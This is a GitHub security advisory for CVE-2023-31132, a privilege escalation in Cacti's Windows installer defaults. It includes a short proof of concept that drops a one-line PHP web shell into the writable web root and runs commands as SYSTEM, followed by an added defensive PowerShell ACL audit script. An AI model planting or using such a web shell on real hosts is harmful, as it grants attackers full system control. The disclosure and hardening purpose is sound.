Privilege escalation when Cacti installed using Windows Installer defaults

High
netniV published GHSA-rf5w-pq3f-9876 Sep 5, 2023

Package

No package listed

Affected versions

< 1.2.25

Patched versions

1.2.25, 1.3.0

Description

Summary

A researcher within Tenable has discovered a privilege escalation vulnerability in Cacti 1.2.24. A low-privileged OS user with access to a Windows host where Cacti is installed can create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.

Details

We believe the vulnerability has a CVSSv3 vector of CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H. We have verified this issue with Cacti 1.2.24 installed on a Windows Server 2019 virtual machine. Here are the steps we used to set up the application:

  • Download and run installer Cacti-1.2.24.exe as Administrator
  • Select Apache as the web server and use defaults for other settings
  • Log in to the Cacti web UI to finish the initial Cacti configuration
  • Create a low-privileged OS user (i.e., user1 in Users group) with RDP privilege

PoC:
// After login/RDP as user1

PS C:\Users\user1> echo '<?php system($_SERVER[''HTTP_X_CMD'']);?>' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty  Content
nt authority\system

Impact

Privilege escalation from normal user account to SYSTEM.

Disclosure Policy

Tenable follows a 90-day vulnerability disclosure policy. That means, even though we prefer coordinated disclosure, we’ll issue an advisory on June 18, 2023 with or without a patch. Alternatively, any uncoordinated vendor release of a patch or advisory to any customers before the 90-day deadline will be considered public disclosure, and Tenable may release an advisory prior to the coordinated disclosure date. Please read the full details of our policy here: https://static.tenable.com/research/tenable-vulnerability-disclosure-policy.pdf.

This issue is tracked internally via TRA-469.

Thank you for taking the time to read this. We'd greatly appreciate it if you'd acknowledge receipt of this report. If you have any questions, we'd be happy to address them.
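The PoC above works because the Cacti document root is writable by an ordinary OS user while Apache runs as SYSTEM. The following audit script is an added example for administrators checking an existing install; it is not part of the Tenable report or the Cacti project. It assumes the document root C:\Apache24\htdocs\cacti (taken from the PoC) and the Apache service name 'Apache2.4' (an assumed default; adjust to your install).

```powershell
# Added example (not from the report or the Cacti project): report ACL entries
# on the Cacti web root that let low-privileged principals write files, and
# show the account the Apache service runs under.
# Assumptions: document root from the PoC; service name 'Apache2.4' is assumed.
param(
    [string]$DocRoot = 'C:\Apache24\htdocs\cacti',
    [string]$ServiceName = 'Apache2.4'
)

# Every local user is a member of these principals; write access for any of
# them means a low-privileged user can drop a .php file into the web root.
$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')
$WriteMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::CreateFiles

function Get-WeakWriteAces {
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        $isAllow    = $ace.AccessControlType -eq 'Allow'
        $grantsWrite = ($ace.FileSystemRights -band $WriteMask) -ne 0
        $isLowPriv  = $LowPrivPrincipals -contains $ace.IdentityReference.Value
        if ($isAllow -and $grantsWrite -and $isLowPriv) {
            [pscustomobject]@{
                Path      = $Path
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Check the document root and every directory beneath it.
$dirs = @(Get-Item -Path $DocRoot) + @(Get-ChildItem -Path $DocRoot -Directory -Recurse)
$findings = $dirs | ForEach-Object { Get-WeakWriteAces -Path $_.FullName }

# The service account is what dropped files execute as (SYSTEM in the PoC).
$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
if ($svc) { "Apache service '$ServiceName' runs as: $($svc.StartName)" }
else      { "Apache service '$ServiceName' not found; check the service name." }

if ($findings) {
    "Write access for low-privileged principals found under $($DocRoot):"
    $findings | Format-Table -AutoSize
} else {
    "No low-privileged write ACEs found under $($DocRoot)."
}
```

Any row reported for a principal such as BUILTIN\Users, combined with a service account of LocalSystem, reproduces the condition the PoC exploits; removing that write ACE or running Apache under a dedicated low-privilege account closes it.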

BETA Installer version

A beta version of the 1.2.25 installer has been published, along with a forum post at https://forums.cacti.net/viewtopic.php?p=292797#p292797 that should be read before installing. This is not a production-ready release.

Severity

High

CVSS v3 base metrics

Attack vector: Local
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2023-31132

Weaknesses

No CWEs

Credits